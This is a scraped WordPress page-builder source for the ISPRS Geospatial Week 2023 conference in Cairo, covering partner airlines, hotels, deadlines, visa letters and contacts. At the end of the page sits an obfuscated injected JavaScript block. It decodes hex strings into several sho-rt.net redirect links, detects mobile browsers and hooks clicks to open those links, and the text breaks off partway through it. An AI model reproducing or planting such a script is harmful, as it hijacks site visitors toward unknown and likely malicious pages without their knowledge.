css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 